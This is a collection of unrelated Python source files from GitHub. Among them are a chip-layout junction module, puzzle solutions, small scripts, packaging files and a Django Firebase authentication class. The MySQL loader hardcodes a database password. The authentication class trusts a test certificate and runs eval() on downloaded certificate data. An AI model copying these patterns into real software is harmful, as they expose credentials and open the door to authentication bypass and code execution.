tp_width > -bp_gap_x * 2\n if small_loop:\n bp_gap_x = bp_gap_x_min\n delta_j = self.loop_area / small_loop_height\n\n junction_shapes_top = []\n junction_shapes_bottom = []\n shadow_shapes = []\n\n # create rounded bottom part and top parts\n self.produce_contact_pads(top_pad_layer, bp_height, bp_gap_x, tp_height, tp_width,\n big_loop_height, junction_shapes_bottom, rounding_params,\n shadow_shapes, junction_shapes_top)\n\n # create rectangular junction-support structures and junctions\n if small_loop:\n small_hat = [\n pya.DPoint(-small_hat_width / 2, self.height - tp_height),\n pya.DPoint(-small_hat_width / 2, small_loop_height + loop_bottom_y + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, small_loop_height + loop_bottom_y + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, small_loop_height + loop_bottom_y)\n ]\n junction_shapes_top.append(polygon_with_vsym(small_hat).to_itype(self.layout.dbu))\n if top_pad_layer != \"SIS_junction\":\n junction_shapes_bottom.append(polygon_with_vsym(small_hat).to_itype(self.layout.dbu))\n small_hat_shadow = [\n small_hat[0] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n small_hat[1] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n small_hat[2] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n small_hat[3] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n shadow_shapes.append(polygon_with_vsym(small_hat_shadow).to_itype(self.layout.dbu))\n small_hat[3].x += finger_margin\n self._make_junctions(small_hat[3], loop_bottom_y)\n else:\n tp_brim_left = [\n pya.DPoint(-delta_j / 2 - finger_margin, self.height - tp_height + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, self.height - tp_height)\n ]\n junction_shapes_top.append(polygon_with_vsym(tp_brim_left).to_itype(self.layout.dbu))\n if top_pad_layer != \"SIS_junction\":\n junction_shapes_bottom.append(polygon_with_vsym(tp_brim_left).to_itype(self.layout.dbu))\n tp_brim_shadow_pts = [\n tp_brim_left[0] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n tp_brim_left[1] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n shadow_shapes.append(polygon_with_vsym(tp_brim_shadow_pts).to_itype(self.layout.dbu))\n tp_brim_left[1].x += finger_margin\n self._make_junctions(tp_brim_left[1], bp_height, finger_margin)\n\n self._add_shapes(junction_shapes_bottom, \"SIS_junction\")\n self._add_shapes(junction_shapes_top, top_pad_layer)\n self._add_shapes(shadow_shapes, \"SIS_shadow\")\n self._produce_ground_grid_avoidance()\n self._produce_ground_metal_shapes()\n self._add_refpoints()\n\n def produce_contact_pads(self,top_pad_layer, bp_height, bp_gap_x, tp_height,tp_width, big_loop_height,\n junction_shapes_bottom, rounding_params, shadow_shapes, junction_shapes_top):\n\n bp_pts_left = [\n pya.DPoint(-self.width / 2, -0.5),\n pya.DPoint(-self.width / 2, bp_height),\n pya.DPoint(bp_gap_x, bp_height),\n pya.DPoint(bp_gap_x, self.height - tp_height - big_loop_height)\n ]\n bp_shape = polygon_with_vsym(bp_pts_left)\n self._round_corners_and_append(bp_shape, junction_shapes_bottom, rounding_params)\n\n bp_shadow_pts_left = [\n bp_pts_left[0] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n bp_pts_left[1] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n bp_pts_left[2] + pya.DPoint(self.shadow_margin, self.shadow_margin),\n bp_pts_left[3] + pya.DPoint(self.shadow_margin, self.shadow_margin),\n ]\n bp_shadow_shape = polygon_with_vsym(bp_shadow_pts_left)\n self._round_corners_and_append(bp_shadow_shape, shadow_shapes, rounding_params)\n\n # create rounded top part\n\n tp_pts_left = [\n pya.DPoint(-tp_width / 2, self.height),\n pya.DPoint(-tp_width / 2, self.height - tp_height),\n ]\n tp_shape = polygon_with_vsym(tp_pts_left)\n self._round_corners_and_append(tp_shape, junction_shapes_top, rounding_params)\n\n # add top pad to bottom shapes in case another layer is used for the upper part of the squid\n\n if top_pad_layer != \"SIS_junction\":\n self._round_corners_and_append(tp_shape, junction_shapes_bottom, rounding_params)\n\n tp_shadow_pts_left = [\n tp_pts_left[0] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n tp_pts_left[1] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n tp_shadow_shape = polygon_with_vsym(tp_shadow_pts_left)\n self._round_corners_and_append(tp_shadow_shape, shadow_shapes, rounding_params)\n\n def _make_junctions(self, top_corner, b_corner_y, finger_margin=0):\n \"\"\"Create junction fingers and add them to some SIS layer.\n\n Choose 'SIS_junction' layer by default but 'SIS_junction_2' if ``separate_junctions`` is True.\n \"\"\"\n jx = top_corner.x - (top_corner.y - b_corner_y) / 2\n jy = (top_corner.y + b_corner_y) / 2\n ddb = self.junction_width * sqrt(0.5)\n ddt = self.junction_width * sqrt(0.5)\n if self.mirror_offset:\n ddt += self.offset_compensation * sqrt(0.5)\n else:\n ddb += self.offset_compensation * sqrt(0.5)\n fo = self.finger_overshoot * sqrt(0.5)\n pl = self.finger_overlap * sqrt(0.5) # plus length to connect despite of rounding\n\n def finger_points(size):\n return [\n pya.DPoint(top_corner.x + pl, top_corner.y + size + pl),\n pya.DPoint(top_corner.x + size + pl, top_corner.y + pl),\n pya.DPoint(jx - fo, jy - fo - size),\n pya.DPoint(jx - fo - size, jy - fo),\n ]\n\n finger_bottom = pya.DTrans(-jx, -jy) * pya.DPolygon(finger_points(ddb))\n finger_top = pya.DTrans(-jx, -jy) * pya.DPolygon(finger_points(ddt))\n\n squa = sqrt(2) / 2\n if self.single_junction:\n junction_shapes = [\n (pya.DTrans(jx - finger_margin, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - finger_margin, jy) * finger_bottom).to_itype(self.layout.dbu),\n ]\n # place refpoints at the middle of the junction. In this case, \"l\" and \"r\" coincide.\n self.refpoints[\"l\"] = pya.DPoint(jx - fo - finger_margin + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n self.refpoints[\"r\"] = self.refpoints[\"l\"]\n else:\n junction_shapes = [\n (pya.DTrans(jx - finger_margin, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(0, False, jx - 2 * top_corner.x, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - finger_margin, jy) * finger_bottom).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - 2 * top_corner.x, jy) * finger_bottom).to_itype(self.layout.dbu)\n ]\n # place refpoints at the middle of the left and right junctions\n self.refpoints[\"l\"] = pya.DPoint(jx - fo - finger_margin + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n self.refpoints[\"r\"] = pya.DPoint(jx - fo - 2 * top_corner.x + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n\n junction_region = pya.Region(junction_shapes).merged()\n layer_name = \"SIS_junction_2\" if self.separate_junctions else \"SIS_junction\"\n self.cell.shapes(self.get_layer(layer_name)).insert(junction_region)\n\n def _add_shapes(self, shapes, layer):\n \"\"\"Merge shapes into a region and add it to layer.\"\"\"\n region = pya.Region(shapes).merged()\n self.cell.shapes(self.get_layer(layer)).insert(region)\n\n def _add_refpoints(self):\n \"\"\"Adds the \"origin_squid\" refpoint and port \"common\".\"\"\"\n self.refpoints[\"origin_squid\"] = pya.DPoint(0, 0)\n self.add_port(\"common\", pya.DPoint(0, self.metal_gap_top_y))\n\n def _produce_ground_metal_shapes(self):\n \"\"\"Produces hardcoded shapes in metal gap and metal addition layers.\"\"\"\n # metal additions bottom\n x0 = -12 if self.compact_geometry else -13\n y0 = -1\n bottom_pts = [\n pya.DPoint(x0 - 3, y0 - 1),\n pya.DPoint(x0 - 3, y0 + 2),\n pya.DPoint(x0 - 5, y0 + 2),\n pya.DPoint(x0 - 5, y0 + 5),\n pya.DPoint(x0, y0 + 5),\n pya.DPoint(x0, y0 + 1)\n ]\n shape = polygon_with_vsym(bottom_pts)\n self.cell.shapes(self.get_layer(\"base_metal_addition\")).insert(shape)\n # metal additions top\n y0 = 12 if self.compact_geometry else 14.5\n top_pts = [\n pya.DPoint(-2, y0 + 3),\n pya.DPoint(-2, y0 + 1),\n pya.DPoint(-1, y0 + 1),\n pya.DPoint(-1, y0),\n pya.DPoint(-4, y0),\n pya.DPoint(-4, self.metal_gap_top_y),\n ]\n shape = polygon_with_vsym(top_pts)\n self.cell.shapes(self.get_layer(\"base_metal_addition\")).insert(shape)\n # metal gap\n if self.include_base_metal_gap:\n pts = bottom_pts[::-1] + [pya.DPoint(-20.5, -2), pya.DPoint(-20.5, self.metal_gap_top_y)] + top_pts[::-1]\n shape = polygon_with_vsym(pts)\n self.cell.shapes(self.get_layer(\"base_metal_gap_wo_grid\")).insert(shape)\n\n def _produce_ground_grid_avoidance(self):\n \"\"\"Add ground grid avoidance.\"\"\"\n w = self.cell.dbbox().width()\n h = self.cell.dbbox().height()\n protection = pya.DBox(-w / 2 - self.margin, -2 - self.margin, w / 2 + self.margin, h - 2 + self.margin)\n self.cell.shapes(self.get_layer(\"ground_grid_avoidance\")).insert(protection)\n\n def _round_corners_and_append(self, polygon, polygon_list, rounding_params):\n \"\"\"Rounds the corners of the polygon, converts it to integer coordinates, and adds it to the polygon list.\"\"\"\n polygon = polygon.round_corners(rounding_params[\"rinner\"], rounding_params[\"router\"], rounding_params[\"n\"])\n polygon_list.append(polygon.to_itype(self.layout.dbu))\n","repo_name":"iqm-finland/KQCircuits","sub_path":"klayout_package/python/kqcircuits/junctions/manhattan.py","file_name":"manhattan.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"61"} +{"seq_id":"23442098111","text":"import sys\n\n# def bitWiseAnd(str1, str2):\n# \tdiff = len(str1) - len(str2)\n# \tif diff > 0:\n# \t\tstr1\ndef howManyWays(A, B, K):\n\tways = 0\n\tfor i in range(0, A):\n\t\tfor j in range(0, B):\n\t\t\tbit = i&j\n\t\t\tif bit < K and bit > -1:\n\t\t\t\tways += 1\n\treturn ways\n\ninfile = sys.argv[1]\noutfile = sys.argv[2]\n\ninf = open(infile)\noutf = open(outfile, 'w')\nnumTestCases = int(inf.readline())\n\nfor testcase in range(1, numTestCases+1):\n\tread = inf.readline().split()\n\tA = int(read[0])\n\tB = int(read[1])\n\tK = int(read[2])\n\toutf.write('Case #'+str(testcase)+': '+str(howManyWays(A, B, K))+'\\n')","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/428.py","file_name":"428.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31879414865","text":"################################################ GAME ACERTE A PALAVRA ################################################\nsecreto = 'perfume'\ndigitadas = []\nchances = 3\n\n\nprint('Você tem 3 chances de acerta a palavra correta.\\n')\n\n\nprint('#' * 60)\nwhile True:\n \n if chances <=0:\n print('Voce Perdeu!!!')\n letra = input('Digite uma letra: ')\n print()\n \n if len(letra) > 1:\n print('Ahhh isso não vale, digite apenas uma letra.')\n continue\n digitadas.append(letra)\n \n \n if letra in secreto:\n print(f'Uhuuuuu, a letra \"{letra}\" existe na palavra secretra.\\n')\n \n else:\n print(f'Afffzzzz: a letra \"{letra}\" NÃO EXISTE na palavra secretra.\\n')\n \n digitadas.pop()\n \n \n secreto_temp = ''\n for letra_secreta in secreto:\n if letra_secreta in digitadas:\n secreto_temp += letra_secreta\n else:\n secreto_temp += '*'\n \n if secreto_temp == secreto:\n print(f'Parabéns, VOCÊ GANHOU O JOGO!!! A palavra era {secreto_temp}.\\n')\n break\n else:\n print(f'A palavra secreta está assim: {secreto_temp}\\n')\n \n \n if letra not in secreto:\n chances -= 1\n print(f'Você ainda tem {chances} chances.\\n')\n \n print('#' * 60)\n \n if chances == 0:\n print('Você PERDEU, Acabou suas chances. :(')\n break","repo_name":"Ediiney/Jogo-Acerte-a-Palavra","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32030415383","text":"#!/usr/bin/env python3\n\nimport yaml\nimport json\n\nfh = open(\"test.yaml\", \"r\", encoding=\"utf-8\")\ntext = fh.read()\ndata = yaml.load(text, Loader=yaml.FullLoader)\n\nprint(\"YAML Dump:\")\nprint(yaml.dump(data, sort_keys=False)) # see more: help(yaml.Dumper)\n\n# refer to https://stackoverflow.com/questions/53757981/converting-yaml-to-jsontypeerror-object-of-type-date-is-not-json-serializabl\nimport datetime\ndef DateEncoder(obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.strftime('%Y-%m-%d')\n\nprint(\"JSON Dump:\")\nprint(json.dumps(data, indent=4, default=DateEncoder))\n\n","repo_name":"xzhong86/MyLangLib","sub_path":"python/t10-yaml-json.py","file_name":"t10-yaml-json.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26644112714","text":"'''\nАлгоритм поразрядной сортировки использует сортировку подсчетом для\nпоследовательной сортировки элементов относительно каждого из разрядов, начиная\nсо старшего.\n'''\n\n\ndef counting_sort_for_radix_sort(A, d, k=10):\n n = len(A)\n C = [0 for _ in range(k)]\n B = [0 for i in range(n)]\n for i in range(n):\n C[radix(A[i], d)] += 1\n for i in range(1, k):\n C[i] += C[i-1]\n for i in range(-1, -n-1, -1):\n B[C[radix(A[i], d)]-1] = A[i]\n C[radix(A[i], d)] -= 1\n for i in range(n):\n A[i] = B[i]\n\n\ndef radix(x, d, k=10):\n return (x // k ** d) % k\n\n\ndef radix_sort(A):\n n = len(A)\n if n > 0 and min(A) >= 0:\n d = len(str(max(A)))\n for i in range(d):\n counting_sort_for_radix_sort(A, i)\n\n\ndef main():\n A = [329, 457, 657, 839, 436, 720, 355]\n radix_sort(A)\n print(A)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leonid-T/Algorithms","sub_path":"Sorting/Radix sort/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16451872184","text":"# -*- coding: utf-8 -*- \n#!/usr/bin/env python\nimport sys\nimport getpass \nimport pymysql\nimport csv\n\n#mysql server 연결, port 및 host 주의!\nconn = pymysql.connect(host='localhost',\n port = 3306,\n user='cathy77', \n password='mjwaw4025', \n db='K_COVID19', \n charset='utf8')\n\n# Connection 으로부터 Cursor 생성\ncursor = conn.cursor()\n\n# 중복된 case 제거를 위해 checking list\nkeyData=[]\nwith open(\"../data/K_COVID19.csv\", 'r') as file:\n file_read = csv.reader(file)\n\n col_list = { \n 'region_code' :23,\n 'province' :4,\n 'confirmed_date' : 10,\n 'avg_temp' : 14,\n 'min_temp' : 15,\n 'max_temp' :16,\n }\n\n for i,line in enumerate(file_read):\n\n #Skip first line\n if not i: \n continue\n\n # checking duplicate region_code & checking region_code == \"NULL\"\n if (line[col_list['confirmed_date']] == \"NULL\") or (line[col_list['region_code']] == \"NULL\"):\n continue\n if ([line[col_list['confirmed_date']], line[col_list['region_code']]] in keyData):\n continue\n else:\n data=[]\n data.append(line[col_list['confirmed_date']])\n data.append( line[col_list['region_code']])\n keyData.append(data)\n\n #make sql data & query\n sql_data = []\n #print(line)\n #\"NULL\" -> None (String -> null)\n #print(col_list.values())\n for idx in col_list.values() :\n if line[idx] == \"NULL\" :\n line[idx] = None\n else:\n line[idx] = line[idx].strip()\n\n sql_data.append(line[idx])\n #print(sql_data)\n query = \"\"\"INSERT INTO `WEATHER`(region_code, province, wdate, avg_temp, min_temp, max_temp) VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\n sql_data = tuple(sql_data)\n #print(sql_data)\n #for debug\n try:\n cursor.execute(query, sql_data)\n print(\"[OK] Inserting [%s] to Weather\"%(data))\n except (pymysql.Error, pymysql.Warning) as e :\n # print(\"[Error] %s\"%(pymysql.IntegrityError))\n if e.args[0] == 1062: continue\n print('[Error] %s | %s'%(line[col_list['region_code']],e))\n break\n\nconn.commit()\ncursor.close()\n\nprint(len(keyData))","repo_name":"thing-zoo/kcovid19-team-project","sub_path":"1주차/parsing_weather.py","file_name":"parsing_weather.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33809508687","text":"from selenium import webdriver\nimport pytest\nimport time\n#from .test_login_page import LogIn\nfrom .pages.login_page import LoginPage\nfrom .data import *\n#import uuid\n#import allure\n\ndef pytest_addoption(parser):\n parser.addoption('--browser_name', action='store', default=\"chrome\",\n help=\"Choose browser: chrome or firefox\")\n parser.addoption('--language', action='store', default='en',\n help=\"Choose language: ec, fr, ru, .....\")\n\n\n@pytest.fixture(scope=\"session\") # выполняется перед каждой сессией\n#@pytest.fixture(scope=\"package\") \n#@pytest.fixture(scope=\"module\") \n#@pytest.fixture(scope=\"class\") \n#@pytest.fixture(scope=\"function\") # выполняется перед каждой функцией\n\ndef browser(request):\n user_language = request.config.getoption(\"language\")\n browser_name = request.config.getoption(\"browser_name\")\n browser = None\n if browser_name == \"chrome\":\n print(\"\\n** START chrome browser for test **\")\n options = webdriver.ChromeOptions()\n options.add_argument('chrome')\n# options.add_argument(\"--headless\") # если запускать без отображения браузера, тогда убрать строку выше options.add_argument('chrome')\n options.add_argument('--start-maximizid')\n options.add_argument('--window-size=1080,1080')\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n elif browser_name == \"firefox\":\n print(\"\\n** START firefox browser for test **\")\n fp = webdriver.FirefoxProfile()\n fp.set_preference(\"intl.accept_languages\", user_language)\n browser = webdriver.Firefox(firefox_profile=fp)\n else:\n raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n yield browser\n print(\"\\n** QUIT browser **\")\n browser.quit()\n\n\n\n@pytest.fixture\ndef login_fixture(browser):\n # авторизация пользователя\n page = LoginPage(browser, '/login') \n print('===================LogIn()==========================') \n page.open()\n page.logout_user() # выход из авторизации, если есть авторизация\n page.login_user(*login_password_valid) # авторизация пользователя \n time.sleep(2)\n","repo_name":"ser888000/bumbleby","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39195367445","text":"import requests\nimport json\n\n\nclass RecaptchaService:\n\n def __init__(self, secret):\n self.secret = secret\n\n def verify_token(self, *args, **kwargs):\n try:\n token = kwargs['token'] if \"token\" in kwargs.keys() else None\n response = requests.post(\"https://www.google.com/recaptcha/api/siteverify\", data={\n \"secret\":self.secret,\n \"response\":token\n })\n response = json.loads(response.text).get(\"success\")\n return response\n except Exception as e:\n print(e)\n return False\n","repo_name":"imjayyy/autotrader","sub_path":"autotrader_web/service/recaptcha.py","file_name":"recaptcha.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554900571","text":"\r\n\"\"\"\r\n\r\nBasic idea:\r\n\tFind the longest non-decreasing sequence of digits that starts that the beginning of the number.\r\n\tIf this sequence is the whole number, then the input was tidy, so output it\r\n\tOtherwise, we find the last digit in the non-decreasing sequence, except that if that digit is repeated in the non-decreasing sequence,\r\n\t\twe walk backwards until we find the first time that digit occurred in the non-decreasing sequence. We then decrease the digit we found\r\n\t\tby one, and set all digits after it to a 9, forming the smallest tidy number smaller than the input.\r\n\tIf the digit we were set to decrease was the leading digit and was a 1, we need to make sure we don't include a leading zero\r\n\r\n\"\"\"\r\n\r\ndef getNumDigits(num):\r\n\t\"\"\"Get the number of digits in an integer num.\r\n\t\tI know that this can be done more easily using a log base 10, but Python's built in log function\r\n\t\thas numerical precision issues and was saying that the log of 1000 was just slightly less than 3,\r\n\t\tand I'm concerned that it would also fail in other cases.\"\"\"\r\n\tnumDigits = 0\r\n\twhile num > 0:\r\n\t\tnum = num // 10\r\n\t\tnumDigits += 1\r\n\treturn numDigits\r\n\r\ndef getDigit(num, pos):\r\n\t\"\"\"Given an integer num, returns the digit at position pos, where position 0 is the ones place\r\n\t\tIf num has fewer digits than pos, raises a ValueError\"\"\"\r\n\tnumDigits = getNumDigits(num)\r\n\tif pos >= numDigits:\r\n\t\traise ValueError(\"Asked for digit in position \" + str(pos) + \", but \" + str(num) + \" only has \" + str(numDigits) + \" digits!\")\r\n\tret = num // (10**pos) # trim off lower digits\r\n\treturn ret % 10 # return the digit that is now in the ones place\r\n\r\ndef getLastTidyDigit(num):\r\n\t\"\"\"Given an integer num, returns the position of the last \"tidy\" digit:\r\n\t\tthe last digit for which the previous digits formed a non-decreasing sequence\"\"\"\r\n\tlastPos = getNumDigits(num) - 1 # the right-most position in the number --> number of digits minus 1 for zero-indexing\r\n\tcurrPos = lastPos - 1 # the leading digit is guaranteed to be tidy, so start checking from the second-to-left\r\n\tprevDigit = getDigit(num, lastPos)\r\n\twhile currPos >= 0:\r\n\t\tcurrDigit = getDigit(num, currPos)\r\n\t\tif currDigit < prevDigit:\r\n\t\t\treturn currPos + 1 # this digit isn't tidy, but the last one was\r\n\t\tprevDigit = currDigit\r\n\t\tcurrPos -= 1\r\n\t# if got to here, the whole number is tidy, so the last tidy digit is the one to the far right\r\n\treturn 0\r\n\r\nnumInputs = int(input())\r\n\r\nfor case in range(1, numInputs + 1):\r\n\tlastNum = int(input())\r\n\tlastTidyDigit = getLastTidyDigit(lastNum)\r\n\tif lastTidyDigit == 0:\r\n\t\t# means that the whole number is tidy, so just output it\r\n\t\tprint(\"Case #\" + str(case) + \": \" + str(lastNum))\r\n\t\tcontinue # move on to the next number\r\n\r\n\t# otherwise, walk backwards from the last tidy digit to find the first time it appeared in the non-decreasing sequence\r\n\tnumDigits = getNumDigits(lastNum)\r\n\tfirstAppearence = lastTidyDigit\r\n\tcompareDigit = getDigit(lastNum, firstAppearence)\r\n\twhile firstAppearence < numDigits - 1:\r\n\t\tcurrDigit = getDigit(lastNum, firstAppearence + 1)\r\n\t\tif currDigit == compareDigit:\r\n\t\t\tfirstAppearence += 1\r\n\t\telse:\r\n\t\t\tbreak\r\n\t# if all the digits out to the beginning of the number are the same, firstAppearence will go up to numDigits - 1 (the leading digit),\r\n\t#\tthen exit the loop, so we still get the right answer\r\n\r\n\tif firstAppearence == numDigits - 1:\r\n\t\t# number we're decreasing by one was the leading digit -- it's easier to treat this separately\r\n\t\tout = \"\"\r\n\t\tif compareDigit != 1:\r\n\t\t\t# make sure we don't accidentally include a leading zero\r\n\t\t\tout = str(compareDigit - 1)\r\n\t\tout += \"9\" * (numDigits - 1)\r\n\t\tprint(\"Case #\" + str(case) + \": \" + out)\r\n\t\tcontinue # move on to the next number\r\n\r\n\tleadingDigits = lastNum // (10 ** (firstAppearence + 1)) # the digits to the left of firstAppearence don't change\r\n\tout = str(leadingDigits) + str(compareDigit - 1) # we're guaranteed that compareDigit != 0, since 0 is the smallest digit and so can't be at the end of a non-decreasing sequence\r\n\tout += \"9\" * firstAppearence # all the digits to the right of firstAppearence become 9\r\n\tprint(\"Case #\" + str(case) + \": \" + out)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2202.py","file_name":"2202.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70023941315","text":"def sortColors(nums):\n left, right = 0, len(nums) - 1\n \n while left <= right:\n if nums[left]==1:\n # swap\n nums[left],nums[right] = nums[right], nums[left]\n right -= 1\n else:\n left += 1\n\n\n# 测试\nnums = [1, 0, 1, 0, 1, 0,0,0,0]\nsortColors(nums)\nprint(nums) # 输出: [0, 0, 0, 1, 1, 1]\n","repo_name":"YidanWWW/Leetcode","sub_path":"Arrays and String/TwoPointers/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25794957598","text":"import re\n\nfrom setuptools import find_namespace_packages, setup\n\nwith open(\"src/panoramic/cli/__version__.py\", encoding=\"utf8\") as f:\n version = re.search(r'__version__ = \"(.*?)\"', f.read()).group(1) # type: ignore\n\nTEST_REQUIRES = [\n \"pytest>=5.3.5\",\n \"responses>=0.10.14\",\n \"freezegun>=0.3.15\",\n \"typing_extensions>=3.7.4\",\n]\nDEV_REQUIRES = [\"mypy>=0.790\", \"flake8>=3.8.3\", \"black==20.8b0\", \"pre-commit==2.9.3\"]\n\nsetup(\n name=\"pano\",\n description=\"Panoramic Command Line Tool\",\n url=\"https://github.com/panoramichq/panoramic-cli\",\n project_urls={\"Source Code\": \"https://github.com/panoramichq/panoramic-cli\"},\n author=\"Panoramic\",\n maintainer=\"Panoramic\",\n version=version,\n long_description=open(\"README.md\").read(),\n long_description_content_type=\"text/markdown\",\n packages=find_namespace_packages(where='src', include=[\"panoramic.*\"]),\n package_dir={\"\": \"src\"},\n python_requires=\">=3.6\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n ],\n install_requires=[\n 'click>=7.1.2',\n 'colorama>=0.4.3',\n 'PyYAML==5.3.1',\n 'packaging>=20.4',\n 'tqdm==4.47.0',\n 'python-dotenv>=0.14.0',\n 'jsonschema>=3.0',\n 'requests>=2.18.0',\n \"importlib_resources ; python_version<'3.7'\",\n \"analytics-python==1.2.9\",\n \"sqlalchemy>=1.3.19\",\n \"snowflake-sqlalchemy==1.2.3\",\n \"pybigquery==0.4.15\",\n \"schematics==2.1.0\",\n \"pydash==4.7.4\",\n \"Unidecode==1.0.23\",\n \"networkx==2.3\",\n \"xxhash==1.3.0\",\n \"antlr4-python3-runtime==4.8\",\n \"pydantic==1.5.1\",\n \"docstring_parser==0.7.3\",\n ],\n extras_require={\"tests\": TEST_REQUIRES, \"dev\": TEST_REQUIRES + DEV_REQUIRES},\n include_package_data=True,\n entry_points={\"console_scripts\": [\"pano=panoramic.cli:cli\"]},\n)\n","repo_name":"panoramichq/panoramic-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"5696853936","text":"import sys\n\nn,m = map(int,sys.stdin.readline().split())\ntime = list(map(int,sys.stdin.readline().split()))\n\nstart = max(time)\nend = sum(time) # 최대 크기\nresult = 0\nwhile start <= end :\n mid = (start+end)//2\n count = 1\n sum = time[0]\n for i in range(1,n):\n if mid < sum + time[i] :\n sum = time[i]\n count += 1\n else : sum += time[i]\n if count > m :\n start = mid +1\n else : \n result = mid\n end = mid - 1\n \nprint(result)","repo_name":"wnsrb003/backjunTEST","sub_path":"6월/영지문제-15번.py","file_name":"영지문제-15번.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3117149443","text":"from esloq.models import EsloqUser\nfrom rest_framework import authentication\nfrom rest_framework import exceptions\nfrom cryptography.exceptions import InvalidSignature\nimport jwt\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.backends import default_backend\nimport urllib.request\n\nclass FirebaseAuthentication(authentication.BaseAuthentication):\n \"\"\"\n Returns the authenticated user if the user provided a valid Firebase \n authentication token in the Authorization header. The header must look like this:\n Authorization: Bearer \n \"\"\"\n def authenticate(self, request):\n auth_header = request.META.get('HTTP_AUTHORIZATION') # get the username request header\n\n # remove these 2 lines below\n # user = EsloqUser.objects.get(id=1) # get the user\n # return (user, None)\n\n if not auth_header: # no token passed in request headers\n return None # authentication did not succeed\n\n try:\n token = auth_header.split(\"Bearer \")[1]\n idinfo = _verifyidtoken(token)\n except IndexError as e:\n return None # authentication did not succeed\n except InvalidSignature as e:\n return None\n\n try:\n firebase_id = idinfo['sub']\n user = EsloqUser.objects.get(firebase_id=firebase_id) # get the user\n except EsloqUser.DoesNotExist:\n return None\n # raise exceptions.AuthenticationFailed('No such user') # raise exception if user does not exist \n\n return (user, None) # authentication successful\n\ndef _verifyidtoken(token):\n # Open file containing Firebase's certificates\n with open('esloq/firebase_certs.txt', 'r') as f:\n data = f.read()\n certs = eval(data)\n with open('esloq/tests/cert.pem', 'r') as f:\n test_cert = f.read()\n certs[\"0\"] = test_cert\n jwt_header = jwt.get_unverified_header(token)\n\n # Try to extract certificate, if it is not present, download the new certificates.\n try:\n certs[jwt_header[\"kid\"]]\n except KeyError:\n url = \"https://www.googleapis.com/robot/v1/metadata/x509/securetoken@system.gserviceaccount.com\"\n with urllib.request.urlopen(url) as response:\n html = response.read()\n with open('esloq/firebase_certs.txt', 'wb') as f:\n f.write(html)\n certs = eval(html)\n\n certificate_text = bytes(certs[jwt_header[\"kid\"]], \"ASCII\")\n public_key = load_pem_x509_certificate(certificate_text, default_backend()).public_key()\n\n try:\n verified_jwt = jwt.decode(token, public_key, audience='decoded-totem-95010', issuer='https://securetoken.google.com/decoded-totem-95010', algorithm='RS256', leeway=10)\n return verified_jwt\n except:\n raise InvalidSignature(\"Invalid authorization 